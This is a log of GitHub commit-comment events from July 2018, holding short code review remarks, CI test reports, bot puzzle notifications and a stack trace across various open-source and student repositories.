{"id":"7965633119","type":"CommitCommentEvent","actor":{"login":"Rahulaarvi"},"repo":{"name":"Rahulaarvi/letslearngit"},"payload":{"comment":{"id":29708924,"position":null,"line":null,"path":null,"commit_id":"f58fb6c1918f0d05002fcca31daf578aac1a710c","created_at":"2018-07-14T11:18:50Z","updated_at":"2018-07-14T11:18:50Z","author_association":"OWNER","body":"Good"}},"created_at":"2018-07-14T11:18:50Z"}
{"id":"7965645163","type":"CommitCommentEvent","actor":{"login":"vinriviere"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29708940,"position":null,"line":null,"path":null,"commit_id":"5fa766896bf409d00ae19f4c497f7cb36d1b0d09","created_at":"2018-07-14T11:30:18Z","updated_at":"2018-07-14T11:30:18Z","author_association":"MEMBER","body":"When the program name is not available, the MiNTLib startup code sets argv[0] to \"\" (empty string). So the original code is perfectly valid. With your change, argv[0] is always ignored, even when available.\r\nSo your change looks bad.\r\nDo you have any real-word testcase to justify this?"}},"created_at":"2018-07-14T11:30:18Z"}
{"id":"7965646437","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29708946,"position":14,"line":9,"path":"lesson4/cargoTrain.rb","commit_id":"07348bd7339ba55003a6d3ed116376203a759c04","created_at":"2018-07-14T11:31:22Z","updated_at":"2018-07-14T11:31:22Z","author_association":"NONE","body":"Да, это уже хорошо. Только давай поменяем методы местами, что-б если читать код сверху вниз видно было что это за type, не меняя контекста."}},"created_at":"2018-07-14T11:31:22Z"}
{"id":"7965646524","type":"CommitCommentEvent","actor":{"login":"davidstl"},"repo":{"name":"getbraincloud/braincloud-js"},"payload":{"comment":{"id":29708947,"position":null,"line":null,"path":null,"commit_id":"4febb19c158eec7e824cab1f35285ccebf1c9f57","created_at":"2018-07-14T11:31:28Z","updated_at":"2018-07-14T11:31:28Z","author_association":"NONE","body":"I'm curious. why?"}},"created_at":"2018-07-14T11:31:28Z"}
{"id":"7965647127","type":"CommitCommentEvent","actor":{"login":"datakurre"},"repo":{"name":"collective/gatsby-source-plone"},"payload":{"comment":{"id":29708948,"position":null,"line":null,"path":null,"commit_id":"52c6d4f68c84dec30e1072cda1a11c43a4dd3799","created_at":"2018-07-14T11:32:01Z","updated_at":"2018-07-14T11:32:01Z","author_association":"COLLABORATOR","body":"@ajayns Yes, this was not the a correct fix.\r\n\r\nThe issue was that processData was modified from sync function to async function, but was not properly awaited by its callers.\r\n\r\nhttps://github.com/collective/gatsby-source-plone/pull/127/commits/5b2138f9593138b356ad206fee86f3326f3b335f"}},"created_at":"2018-07-14T11:32:01Z"}
{"id":"7965649942","type":"CommitCommentEvent","actor":{"login":"SlidyBat"},"repo":{"name":"FinalL/chili_framework"},"payload":{"comment":{"id":29708950,"position":null,"line":null,"path":null,"commit_id":"ff359d4a3ef8d14e0563b65496ae0a7d9756982f","created_at":"2018-07-14T11:34:42Z","updated_at":"2018-07-14T11:34:42Z","author_association":"NONE","body":"lol thjis sux LMAOOOO"}},"created_at":"2018-07-14T11:34:42Z"}
{"id":"7965650272","type":"CommitCommentEvent","actor":{"login":"GabsReDeal"},"repo":{"name":"Code-Bullet/Google-Chrome-Dino-Game-AI"},"payload":{"comment":{"id":29708951,"position":null,"line":null,"path":null,"commit_id":"c0717dbfacdd04281bb180df68ef6ea2ae4c47aa","created_at":"2018-07-14T11:35:03Z","updated_at":"2018-07-14T11:35:03Z","author_association":"NONE","body":"In reply to @EchoSpark267 \r\n\r\nAfter downloading these files you should download and install Processing IDE.\r\n\r\nWhen Processing is done installing, open any of the .pde files in the DinoGame folder using Processing. Processing will start to load and when it is done loading, you will have all the rest of the project's files open. \r\n\r\nPress the play button whenever you want to start and you're done."}},"created_at":"2018-07-14T11:35:03Z"}
{"id":"7965651667","type":"CommitCommentEvent","actor":{"login":"GabsReDeal"},"repo":{"name":"Code-Bullet/Google-Chrome-Dino-Game-AI"},"payload":{"comment":{"id":29708953,"position":null,"line":null,"path":null,"commit_id":"9d601157baf4de54b20454170af8d276c526e113","created_at":"2018-07-14T11:36:28Z","updated_at":"2018-07-14T11:36:28Z","author_association":"NONE","body":"In reply to @EchoSpark267 \r\n\r\nAfter downloading these files you should download and install Processing IDE.\r\n\r\nWhen Processing is done installing, open any of the .pde files in the DinoGame folder using Processing. Processing will start to load and when it is done loading, you will have all the rest of the project's files open. \r\n\r\nPress the play button whenever you want to start and you're done."}},"created_at":"2018-07-14T11:36:28Z"}
{"id":"7965652059","type":"CommitCommentEvent","actor":{"login":"bigman212"},"repo":{"name":"Themis404/create_competition"},"payload":{"comment":{"id":29708958,"position":4,"line":8,"path":"package.json","commit_id":"cc5d65e63379dcfcca46de7360cc0037ce073aae","created_at":"2018-07-14T11:36:53Z","updated_at":"2018-07-14T11:36:53Z","author_association":"COLLABORATOR","body":"Лучше ставить точные версии библиотек, например только 16.4.1. \r\n^ - показывает что будет использована самая последняя версия. Могут возникнут проблемы если разработчики что-то изменят в своей  новой версии библиотеки."}},"created_at":"2018-07-14T11:36:53Z"}
{"id":"7965652697","type":"CommitCommentEvent","actor":{"login":"bigman212"},"repo":{"name":"Themis404/create_competition"},"payload":{"comment":{"id":29708962,"position":43,"line":43,"path":"src/containers/baseComponent.jsx","commit_id":"cc5d65e63379dcfcca46de7360cc0037ce073aae","created_at":"2018-07-14T11:37:32Z","updated_at":"2018-07-14T11:37:32Z","author_association":"COLLABORATOR","body":"Что за файл?"}},"created_at":"2018-07-14T11:37:32Z"}
{"id":"7965653895","type":"CommitCommentEvent","actor":{"login":"dritter"},"repo":{"name":"bhilburn/powerlevel9k"},"payload":{"comment":{"id":29708966,"position":16,"line":1273,"path":"powerlevel9k.zsh-theme","commit_id":"29c30182d945eecab48f5676d65c83885d7555cb","created_at":"2018-07-14T11:38:44Z","updated_at":"2018-07-14T11:38:44Z","author_association":"COLLABORATOR","body":"This condition needs to be flipped as well now.."}},"created_at":"2018-07-14T11:38:44Z"}
{"id":"7965657322","type":"CommitCommentEvent","actor":{"login":"HeronZhao"},"repo":{"name":"Produce404/MyCampus"},"payload":{"comment":{"id":29708968,"position":null,"line":null,"path":null,"commit_id":"faa57cc0a58de89ab73362a8878fc427f28d1083","created_at":"2018-07-14T11:41:52Z","updated_at":"2018-07-14T11:41:52Z","author_association":"CONTRIBUTOR","body":"回退"}},"created_at":"2018-07-14T11:41:52Z"}
{"id":"7965657594","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29708969,"position":14,"line":9,"path":"lesson4/cargoTrain.rb","commit_id":"07348bd7339ba55003a6d3ed116376203a759c04","created_at":"2018-07-14T11:42:09Z","updated_at":"2018-07-14T11:42:09Z","author_association":"NONE","body":"Еще вот такой вариант достоин внимания.\r\n``` \r\n# В подклассе вызвать инишалайз с \"захардкоденым типом\"\r\nclass CargoTrain < Train\r\n  def initialize(number)\r\n    super(number, :cargo)\r\n  end\r\nend\r\n\r\n# И в супперклассе его обрабатывать оба аргумента в инишалайзе\r\nclass Train\r\n  attr_reader :number, :type, :wagons, :speed\r\n\r\n  def initialize(number, type)\r\n     @number = number\r\n     @type = type\r\n     @wagons = []\r\n  end\r\nend\r\n```\r\nТаким образом в суперклассе \r\n - оказывается общий код по чтению типов\r\n - видны все атрибуты поезда без того, что-б смотреть в подклассы\r\n\r\nВ подклассе\r\n  - Логика по заданию типа при инициализации, что является уникальным для каждого подкласса.\r\n  - Валидация вагона, по совместимости с типом поезда, что уникально для каждого типа поезда/вагона"}},"created_at":"2018-07-14T11:42:09Z"}
{"id":"7965657831","type":"CommitCommentEvent","actor":{"login":"irwir"},"repo":{"name":"miniupnp/miniupnp"},"payload":{"comment":{"id":29708970,"position":null,"line":null,"path":null,"commit_id":"8babc5d01310599ffdfddce09b9cbbd68e508acc","created_at":"2018-07-14T11:42:21Z","updated_at":"2018-07-14T11:42:21Z","author_association":"CONTRIBUTOR","body":"It seems that functions `InetPton` and `InetNtop` are available only since Vista.\r\nThat leaves Windows XP users out of luck.\r\n"}},"created_at":"2018-07-14T11:42:21Z"}
{"id":"7965659256","type":"CommitCommentEvent","actor":{"login":"timmyrs"},"repo":{"name":"lerokko/mcstatusbot"},"payload":{"comment":{"id":29708971,"position":68,"line":68,"path":"mcbot.js","commit_id":"33b9d0288f2bc77f107e3f493567f742df1d1328","created_at":"2018-07-14T11:43:37Z","updated_at":"2018-07-14T11:43:37Z","author_association":"NONE","body":"Did you mean to publish this?"}},"created_at":"2018-07-14T11:43:37Z"}
{"id":"7965659382","type":"CommitCommentEvent","actor":{"login":"AlexaraWu"},"repo":{"name":"bhilburn/powerlevel9k"},"payload":{"comment":{"id":29708972,"position":16,"line":1273,"path":"powerlevel9k.zsh-theme","commit_id":"29c30182d945eecab48f5676d65c83885d7555cb","created_at":"2018-07-14T11:43:45Z","updated_at":"2018-07-14T11:43:45Z","author_association":"NONE","body":"I have noticed this, fixed already."}},"created_at":"2018-07-14T11:43:45Z"}
{"id":"7965660038","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29708974,"position":1,"line":2,"path":"lesson4/cargoWagon.rb","commit_id":"07348bd7339ba55003a6d3ed116376203a759c04","created_at":"2018-07-14T11:44:20Z","updated_at":"2018-07-14T11:44:20Z","author_association":"NONE","body":"Ридер тут не нужен. У нас нет инстанс переменной больше. Вот что делает ридер \"под капотом\"\r\n```\r\ndef type\r\n  @type\r\nend\r\n```\r\nЕсли инстанс переменной ```@type``` нет, то ридер будет всегда возвращать nil"}},"created_at":"2018-07-14T11:44:20Z"}
{"id":"7965660575","type":"CommitCommentEvent","actor":{"login":"syl192"},"repo":{"name":"syl192/dubbo"},"payload":{"comment":{"id":29708975,"position":null,"line":null,"path":null,"commit_id":"6b9aeb94f4f8033c4c2d644f816a5d1a24d2d685","created_at":"2018-07-14T11:44:50Z","updated_at":"2018-07-14T11:44:50Z","author_association":"OWNER","body":"基本框架已经有了，是一个聚合工程"}},"created_at":"2018-07-14T11:44:50Z"}
{"id":"7965660615","type":"CommitCommentEvent","actor":{"login":"yn-coder"},"repo":{"name":"convergenceIM/alpha-scientist"},"payload":{"comment":{"id":29708976,"position":null,"line":null,"path":null,"commit_id":"e9416b756a526196b5999a0b1eaff03db2138b19","created_at":"2018-07-14T11:44:53Z","updated_at":"2018-07-14T11:44:53Z","author_association":"COLLABORATOR","body":"`feed`, not `deed` :)"}},"created_at":"2018-07-14T11:44:53Z"}
{"id":"7965660737","type":"CommitCommentEvent","actor":{"login":"jfoclpf"},"repo":{"name":"jfoclpf/autocosts"},"payload":{"comment":{"id":29708977,"position":4,"line":74,"path":"src/css/style.css","commit_id":"b920bbd744248df57c92694450c2b8b57f77752e","created_at":"2018-07-14T11:45:00Z","updated_at":"2018-07-14T11:45:00Z","author_association":"OWNER","body":"fixed\n\nJoão Pimentel Ferreira <http://joaopimentel.eu>\n\n\nOn Fri, 13 Jul 2018 at 21:35, João Pimentel Ferreira <\njoao.pimentel.ferreira@gmail.com> wrote:\n\n> perfect :)\n> No problems\n>\n> João Pimentel Ferreira <http://joaopimentel.eu>\n>\n>\n> On Fri, 13 Jul 2018 at 21:10, Martín Cristaldo <notifications@github.com>\n> wrote:\n>\n>> Oh sorry I thought you didn't touch the style.css file. Yes, put it back\n>> please.\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/jfoclpf/autocosts/commit/b920bbd744248df57c92694450c2b8b57f77752e#commitcomment-29704108>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ADzODaTK7hrRFSvnv8s02p6hsuQD1GzHks5uGPCNgaJpZM4VPXsJ>\n>> .\n>>\n>\n"}},"created_at":"2018-07-14T11:45:00Z"}
{"id":"7965661017","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29708979,"position":3,"line":4,"path":"lesson4/cargoWagon.rb","commit_id":"07348bd7339ba55003a6d3ed116376203a759c04","created_at":"2018-07-14T11:45:15Z","updated_at":"2018-07-14T11:45:15Z","author_association":"NONE","body":"А вот тут вместо инишалайза должен быть ```def type``` с тем-же телом"}},"created_at":"2018-07-14T11:45:15Z"}
{"id":"7965661360","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29708982,"position":null,"line":null,"path":null,"commit_id":"c71627fd067be16603b448365c06de52e534e203","created_at":"2018-07-14T11:45:33Z","updated_at":"2018-07-14T11:45:33Z","author_association":"COLLABORATOR","body":"Puzzle `215-3296d73b` disappeared from [`stroyprombeton/tests/tests_selenium_admin.py`](https://github.com/fidals/stroyprombeton/blob/master/stroyprombeton/tests/tests_selenium_admin.py), that's why I closed #235. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-14T11:45:33Z"}
{"id":"7965661407","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29708983,"position":null,"line":null,"path":null,"commit_id":"c71627fd067be16603b448365c06de52e534e203","created_at":"2018-07-14T11:45:35Z","updated_at":"2018-07-14T11:45:35Z","author_association":"COLLABORATOR","body":"Puzzle `380-a9650120` disappeared from [`stroyprombeton/tests/tests_selenium_admin.py`](https://github.com/fidals/stroyprombeton/blob/master/stroyprombeton/tests/tests_selenium_admin.py), that's why I closed #248. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-14T11:45:35Z"}
{"id":"7965661472","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29708984,"position":null,"line":null,"path":null,"commit_id":"c71627fd067be16603b448365c06de52e534e203","created_at":"2018-07-14T11:45:39Z","updated_at":"2018-07-14T11:45:39Z","author_association":"COLLABORATOR","body":"Puzzle `238-9c5eed31` discovered in   [`stroyprombeton/tests/tests_selenium_admin.py`](  https://github.com/fidals/stroyprombeton/blob/master/stroyprombeton/tests/tests_selenium_admin.py)   and submitted as #255. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-14T11:45:39Z"}
{"id":"7965661519","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29708985,"position":null,"line":null,"path":null,"commit_id":"c71627fd067be16603b448365c06de52e534e203","created_at":"2018-07-14T11:45:42Z","updated_at":"2018-07-14T11:45:42Z","author_association":"COLLABORATOR","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> GET https://api.github.com/repos/fidals/stroyprombeton/issues/380: 404 - Not Found // See: https://developer.github.com/v3/issues/#get-a-single-issue\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nOctokit::NotFound\nGET https://api.github.com/repos/fidals/stroyprombeton/issues/380: 404 - Not Found // See: https://developer.github.com/v3/issues/#get-a-single-issue\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/response/raise_error.rb:16:in `on_complete'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:9:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:61:in `on_complete'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:8:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/middleware/follow_redirects.rb:73:in `perform_with_redirection'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/middleware/follow_redirects.rb:61:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/rack_builder.rb:143:in `build_response'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/connection.rb:387:in `run_request'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/connection.rb:138:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/sawyer-0.8.1/lib/sawyer/agent.rb:94:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/connection.rb:156:in `request'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/connection.rb:19:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/client/issues.rb:114:in `issue'\n/app/objects/github_tickets.rb:39:in `notify'\n/app/objects/logged_tickets.rb:36:in `notify'\n/app/objects/github_tagged_tickets.rb:36:in `notify'\n/app/objects/commit_tickets.rb:34:in `notify'\n/app/objects/emailed_tickets.rb:31:in `notify'\n/app/objects/sentry_tickets.rb:36:in `notify'\n/app/objects/diff.rb:38:in `block in notify'\n/app/objects/diff.rb:33:in `each'\n/app/objects/diff.rb:33:in `notify'\n/app/objects/job.rb:40:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-14T11:45:42Z"}
{"id":"7965662705","type":"CommitCommentEvent","actor":{"login":"pokeron1"},"repo":{"name":"pokeron1/Sports-Website"},"payload":{"comment":{"id":29708990,"position":null,"line":null,"path":null,"commit_id":"b3482f4443b49dcc18ab625f49bca74186a7c91e","created_at":"2018-07-14T11:46:49Z","updated_at":"2018-07-14T11:46:49Z","author_association":"OWNER","body":"what? you just removed half the content! whats that for?"}},"created_at":"2018-07-14T11:46:49Z"}
{"id":"7965662871","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29708991,"position":1,"line":2,"path":"lesson4/route.rb","commit_id":"07348bd7339ba55003a6d3ed116376203a759c04","created_at":"2018-07-14T11:46:57Z","updated_at":"2018-07-14T11:46:57Z","author_association":"NONE","body":":start_station и :end_station не нужны в ридере, раз у нас есть методы. Выше объяснил, что делают ридеры. Прочти, и будет видно, почему они нам больше не нужны"}},"created_at":"2018-07-14T11:46:57Z"}
{"id":"7965663122","type":"CommitCommentEvent","actor":{"login":"WinterMute"},"repo":{"name":"thomasnet-mc/EdiZon"},"payload":{"comment":{"id":29708992,"position":null,"line":null,"path":null,"commit_id":"35df7745930442ad5c0a71261f4d4664d1199019","created_at":"2018-07-14T11:47:11Z","updated_at":"2018-07-14T11:47:11Z","author_association":"NONE","body":"This doesn't resolve #10.\r\n\r\nYou also need this.\r\n\r\n```\r\ndiff --git a/source/save.cpp b/source/save.cpp\r\nindex 37338b1..fa7bc0d 100644\r\n--- a/source/save.cpp\r\n+++ b/source/save.cpp\r\n@@ -1,5 +1,7 @@\r\n #include \"save.hpp\"\r\n\r\n+#include <sys/types.h>\r\n+#include <sys/stat.h>\r\n #include <unistd.h>\r\n\r\n #include \"account.hpp\"\r\n```"}},"created_at":"2018-07-14T11:47:11Z"}
{"id":"7965663459","type":"CommitCommentEvent","actor":{"login":"NorbertColon"},"repo":{"name":"yuzi-co/Forager"},"payload":{"comment":{"id":29708993,"position":null,"line":null,"path":null,"commit_id":"5d9252ccc8bc6bec79059b1fa553d3e8d382b990","created_at":"2018-07-14T11:47:31Z","updated_at":"2018-07-14T11:47:31Z","author_association":"NONE","body":"Double commas (,,) near the end of line 159 in Config-SAMPLE.ini\r\n\r\nKeep up the good work :)"}},"created_at":"2018-07-14T11:47:31Z"}
{"id":"7965665509","type":"CommitCommentEvent","actor":{"login":"qq2310091880"},"repo":{"name":"qq2310091880/TS_WHUT"},"payload":{"comment":{"id":29708995,"position":null,"line":null,"path":null,"commit_id":"3ce777b5d3eb0ef0098b2352a6694582745a1e99","created_at":"2018-07-14T11:49:34Z","updated_at":"2018-07-14T11:49:34Z","author_association":"OWNER","body":"登录注册其实没必要创建一个新的app"}},"created_at":"2018-07-14T11:49:34Z"}
{"id":"7965666792","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29708997,"position":null,"line":null,"path":null,"commit_id":"d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf","created_at":"2018-07-14T11:50:47Z","updated_at":"2018-07-14T11:50:47Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (Unknown) - i386-Windows-7-VisualStudio-14: OK (2944 of 2944 tests passed, 13 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T11:50:47Z"}
{"id":"7965667599","type":"CommitCommentEvent","actor":{"login":"mikrosk"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29708999,"position":45,"line":1943,"path":"sys/usb/src.km/ucd/netusbee/isp116x-hcd.c","commit_id":"c2d4feb3ce8b5bb59411411b6b7bd18139da7110","created_at":"2018-07-14T11:51:35Z","updated_at":"2018-07-14T11:51:35Z","author_association":"MEMBER","body":"So the NetUSBee works on 000 and 060 CPUs but not on 030? I hope this is just a temporary state. :)"}},"created_at":"2018-07-14T11:51:35Z"}
{"id":"7965668336","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29709000,"position":24,"line":21,"path":"lesson4/route.rb","commit_id":"07348bd7339ba55003a6d3ed116376203a759c04","created_at":"2018-07-14T11:52:13Z","updated_at":"2018-07-14T11:52:13Z","author_association":"NONE","body":"self можно не использовать. self - это объект по умолчанию. Внутри инстэнс метода, self будет являтся экземпляром класса с которым мы работаем. В данном случае - экземпляром класса Route. И если мы не пишем конструкцию с присваиванием (типа ```start_station = ```(в этом случае будет использоваться writer кстати)) то будет использоваться инстэнс метод, или reader по умолчанию."}},"created_at":"2018-07-14T11:52:13Z"}
{"id":"7965669444","type":"CommitCommentEvent","actor":{"login":"MeridianOXC"},"repo":{"name":"ohartenstein23/OpenXcom"},"payload":{"comment":{"id":29709003,"position":27,"line":1110,"path":"src/Savegame/Soldier.cpp","commit_id":"8ac85d82eb6fc7e09045c8e8ca5abcbfe88d281a","created_at":"2018-07-14T11:53:13Z","updated_at":"2018-07-14T11:53:13Z","author_association":"NONE","body":"Rank reduced to commander? :P"}},"created_at":"2018-07-14T11:53:13Z"}
{"id":"7965671199","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29709006,"position":24,"line":21,"path":"lesson4/route.rb","commit_id":"07348bd7339ba55003a6d3ed116376203a759c04","created_at":"2018-07-14T11:54:51Z","updated_at":"2018-07-14T11:54:51Z","author_association":"NONE","body":"Обобщая вышесказанное -> self нужен, когда ты хочешь присвоить значение чему-то через writer\r\nclass Dog\r\n  attr_writer :name \r\n\r\n  def rename(new_name)\r\n     self.name = new_name\r\n     # или эквивалентный вариант\r\n     @name = new_name\r\n  end\r\nend\r\n```"}},"created_at":"2018-07-14T11:54:51Z"}
{"id":"7965671213","type":"CommitCommentEvent","actor":{"login":"MeridianOXC"},"repo":{"name":"ohartenstein23/OpenXcom"},"payload":{"comment":{"id":29709007,"position":5,"line":1088,"path":"src/Savegame/Soldier.cpp","commit_id":"8ac85d82eb6fc7e09045c8e8ca5abcbfe88d281a","created_at":"2018-07-14T11:54:52Z","updated_at":"2018-07-14T11:54:52Z","author_association":"NONE","body":"I'll move this whole block to right after soldier type change"}},"created_at":"2018-07-14T11:54:52Z"}
